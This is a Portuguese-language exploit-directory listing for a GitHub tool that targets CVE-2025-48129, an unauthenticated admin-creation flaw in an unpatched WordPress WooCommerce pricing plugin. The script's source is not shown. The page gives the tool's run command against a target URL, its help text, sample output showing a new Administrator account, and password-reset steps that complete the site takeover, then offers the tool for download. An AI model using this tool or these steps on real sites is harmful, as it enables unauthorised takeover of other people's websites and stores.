Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-48129 — O plugin WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 é vulnerável a Escalação de Privilégios. | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-48129
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticação
GitHubnxploited/cve-2025-48129

CVE-2025-48129

O plugin WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 é vulnerável a Escalação de Privilégios.

Ver Repositório
17há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2025-48129 - Escalação de Privilégios no Plugin Spreadsheet Price Changer do WordPress

🛡️ Resumo da Vulnerabilidade

  • Plugin Afetado: Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light
  • Versões Vulneráveis: <= 2.4.37
  • Versão Corrigida: ❌ Nenhuma correção oficial disponível
  • Descoberto Por: Patchstack | 20 de maio de 2025
  • CVE ID: CVE-2025-48129
  • Pontuação CVSS: 9.8 (Crítico)
  • Prioridade de Correção: 🔴 Alta

🔥 Risco

Atacantes não autenticados podem escalar privilégios criando uma conta de nível Administrador sem precisar de qualquer acesso prévio. Isso permite a tomada total do site WordPress.

Classificado como: OWASP A7 – Falhas de Identificação e Autenticação


🧪 Visão Geral do Script de Exploit

Este script Python tem como alvo versões vulneráveis do plugin e registra um novo Administrador WordPress usando apenas um e-mail e senha (com hash via MD5).


▶️ Exemplo de Uso

python CVE-2025-48129.py -u http://target-site.com/wordpress -mail [email protected] -p nxploitadmin

📘 Ajuda de Uso

python CVE-2025-48129.py -help

usage: CVE-2025-48129.py [-h] -u URL -mail MAIL [-p PASSWORD]

CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target WordPress site URL (e.g., http://site.com/)
  -mail, --mail MAIL      Email for the new Admin account
  -p, --password PASSWORD Password to set (default: nxploitadmin)

✅ Exemplo de Saída Bem-sucedida

[*] Checking plugin version...
[*] Plugin version: 2.4.37
[*] Vulnerable version detected. Exploiting...
[+] Exploitation successful!

[*] Login credentials:
    Username: [email protected]
    Password: 21232f297a57a5a743894a0e4a801fc3

[*] If login fails, reset the password manually via:
    http://target-site.com/wordpress/wp-login.php?action=lostpassword

⚠️ Nota Importante

Em alguns casos, fazer login diretamente com a senha escolhida pode falhar.
Isso não é um bug no exploit, mas um resultado de como o plugin vulnerável passa senhas com hash para o sistema interno de criação de usuários do WordPress.

Se você não conseguir fazer login, simplesmente redefina a senha via e-mail usando a seguinte URL:

http://target-site.com/wordpress/wp-login.php?action=lostpassword

O WordPress enviará um e-mail de redefinição de senha para a conta de Administrador que você acabou de criar — concedendo acesso total a você.


🧾 Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de testes de penetração autorizados.
O autor não assume responsabilidade por uso indevido ou danos causados por este script.


Por: Nxploited ( Khaled_alenazi )

Baixar ferramenta